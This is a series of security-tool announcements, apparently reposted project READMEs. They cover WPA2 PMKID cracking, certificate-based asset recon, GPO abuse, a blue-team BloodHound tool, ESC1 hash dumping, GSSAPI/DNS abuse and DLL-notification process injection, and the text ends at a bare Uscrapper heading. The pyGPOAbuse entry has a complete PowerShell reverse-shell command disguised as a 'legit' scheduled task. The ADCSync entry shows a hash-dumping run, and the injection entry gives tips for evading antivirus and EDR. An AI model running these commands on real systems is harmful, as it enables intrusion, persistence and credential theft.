
Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R
15 January 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, and pmkid must be hex strings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
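For reference, here is a minimal Python sketch of both calculations. It is illustrative only and is not the tool's own find_pw_chunk/calculate_pmkid code; the function name and example values are made up.

import hashlib
import hmac

def pmkid_from_passphrase(passphrase, ssid, ap_mac, client_mac):
    # PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32 bytes
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).hexdigest()[:32]

# A candidate passphrase matches when the computed value equals the captured PMKID.
print(pmkid_from_passphrase("password123", "MyWifi", "b8621f50edd9", "aabbccddeeff"))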

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually with Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next three steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
  • In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
  • In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below.

If the access point is vulnerable, you should see the PMKID value as shown in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



CloudRecon - Finding assets from certificates

By: Zion3R
16 January 2024 at 11:30


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

**You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - a LIVE running tool to inspect the ranges in real time for a keyword in the CN and SAN fields of SSL certs.

Store - a tool to retrieve certs from IPs and store all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.
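The common idea behind all three parts is pulling the certificate an IP presents and reading its name fields. Below is a rough Python sketch of that idea; it is not CloudRecon's Go code, and it assumes the third-party cryptography package is installed.

import socket
import ssl
from cryptography import x509
from cryptography.x509.oid import NameOID

def cert_names(ip, port=443, timeout=4):
    # Grab the peer certificate without verification and read its CN and SANs.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock) as tls:
            der = tls.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(der)
    cn = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        sans = cert.extensions.get_extension_for_class(
            x509.SubjectAlternativeName).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        sans = []
    return cn, sans

print(cert_names("1.2.3.4"))

Scrape matches a keyword against these names in real time, while store saves them to a local database that retr can later query.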

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R
17 January 2024 at 11:30


Python partial implementation of SharpGPOAbuse by @pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add the user john to the local administrators group (password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion

By: Zion3R
18 January 2024 at 11:30


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest relationships to gather for BloodHound is local group memberships and session information. As blue teamers, we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here


Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and/or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.

The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self-explanatory, there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
    Enabled: true
    Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
    Enabled: true
    Query: |
      MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
    Parameters:
      Computer: Computer
      TargetUserSid: TargetUserSid
      Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
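To illustrate what that mapping means in practice, here is a hypothetical Python sketch that passes one result row to Neo4j as query parameters using the official neo4j driver. FalconHound itself is written in Go, and the connection details and row values below are made up.

from neo4j import GraphDatabase

query = (
    "MATCH (x:Computer {name:$Computer}) "
    "MATCH (y:User {objectid:$TargetUserSid}) "
    "MERGE (x)-[r:HasSession]->(y) "
    "SET r.since=$Timestamp SET r.source='falconhound'"
)

# One row from the source query; each key matches a replacement field above.
row = {
    "Computer": "WS01.CORP.LOCAL",
    "TargetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1104",
    "Timestamp": "2024-01-18T11:30:00Z",
}

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
with driver.session() as session:
    session.run(query, **row)  # keys become the $Computer/$TargetUserSid/$Timestamp parameters
driver.close()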

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is another reason to keep query output under control; otherwise you might flood your target.

  - Name: Sentinel
    Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

  - Name: Watchlist
    Enabled: true
    WatchlistName: FH_MDE_Exploitable_Machines
    DisplayName: MDE Exploitable Machines
    SearchKey: DeviceName
    Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
    Enabled: true

Azure Data Explorer

Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
    Enabled: true
    Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it has to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is added as a relationship between the computer and the user. The relationship is called HadSession and has the following properties:

{
  "till": "2021-08-31T14:00:00Z",
  "source": "falconhound",
  "reason": "logoff"
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer:
  • 'exploitable': true/false
  • 'exploits': list of CVEs
  • 'exposed': true/false
  • 'ports': list of ports accessible from the internet
  • 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials is to use an Azure Key Vault. Be aware that there is a small cost aspect to using Key Vaults. Access to Key Vaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Key Vault. This role only allows reading the secrets; it cannot even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Key Vault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
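As a rough illustration of that fallback order, here is a hedged Python sketch using the Azure SDK for Python. FalconHound itself is written in Go, and the helper name and its arguments are hypothetical.

from azure.identity import ClientSecretCredential
from azure.keyvault.secrets import SecretClient

def get_secret(name, vault_url, tenant_id, app_id, app_secret, config):
    # Try the Key Vault first; fall back to the equivalent config.yml entry on failure.
    credential = ClientSecretCredential(tenant_id, app_id, app_secret)
    client = SecretClient(vault_url=vault_url, credential=credential)
    try:
        return client.get_secret(name).value
    except Exception:
        return config.get(name)  # missing in the vault: use the config file value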

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log-based queries are built to run every 15 minutes. Should processing take too long, you might need to tweak this a little; in that case it might be better to disable certain actions.

There might also be some overlap, for instance with the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have both MDE and Sentinel connected and most machines onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R
19 January 2024 at 11:30


This is a tool I whipped up quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
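A heavily simplified Python sketch of that loop is shown below. It is illustrative only: the BloodHound JSON layout and the exact Certipy subcommands and flags are assumptions and may differ between versions, so treat the command lines as placeholders.

import json
import subprocess

def adcsync_sketch(users_json, ca, template, target_ip, dc_ip, user, password):
    # Assumed BloodHound layout: a top-level "data" list with Properties.name like USER@DOMAIN.
    with open(users_json) as f:
        entries = json.load(f).get("data", [])
    for entry in entries:
        upn = entry["Properties"]["name"]
        # 1) Request a certificate for the victim UPN via the ESC1 template (flags assumed).
        subprocess.run(["certipy", "req", "-u", user, "-p", password, "-ca", ca,
                        "-template", template, "-target", target_ip, "-upn", upn])
        # 2) Authenticate with the resulting PFX to obtain the NT hash (flags assumed).
        pfx = upn.split("@")[0].lower() + ".pfx"
        subprocess.run(["certipy", "auth", "-pfx", pfx, "-dc-ip", dc_ip])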

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a bloodhound dump that will be passed in.
  3. A template vulnerable to ESC1 (Found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R
20 January 2024 at 11:30


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. The Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing the Python requirements.

All

Once the requirements are satisfied, you can install the Python dependencies via pip/pip3:

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non-Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI-based authentication is permitted.
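The following Python sketch shows the same two steps in miniature. It is not gssapi-abuse's own code; it assumes the third-party ldap3 and paramiko packages, and the LDAP filter and attribute names are the obvious choices for this check.

import ldap3
import paramiko

def enum_gssapi_ssh(dc, domain, username, password):
    # Step 1: LDAP search for computers whose operatingSystem does not contain "Windows".
    server = ldap3.Server(dc, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=f"{domain}\\{username}", password=password,
                            authentication=ldap3.NTLM, auto_bind=True)
    base = ",".join(f"DC={part}" for part in domain.split("."))
    conn.search(base, "(&(objectClass=computer)(!(operatingSystem=*Windows*)))",
                attributes=["dNSHostName"])
    hosts = [e.dNSHostName.value for e in conn.entries if e.dNSHostName.value]

    # Step 2: probe SSH and check whether the server advertises gssapi-with-mic.
    for host in hosts:
        try:
            transport = paramiko.Transport((host, 22))
            transport.start_client(timeout=5)
            try:
                transport.auth_none("probe")
            except paramiko.BadAuthenticationType as exc:
                if "gssapi-with-mic" in exc.allowed_types:
                    print(f"[+] Host {host} has GSSAPI enabled over SSH")
            transport.close()
        except (OSError, paramiko.SSHException):
            pass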

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently, DNS mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a "."; this is important, otherwise the record becomes relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones from A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R
21 January 2024 at 11:30

DllNotificationInjection is a POC of a new "threadless" process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first (now second) entry of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.

Acknowledgments



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R
22 January 2024 at 11:30


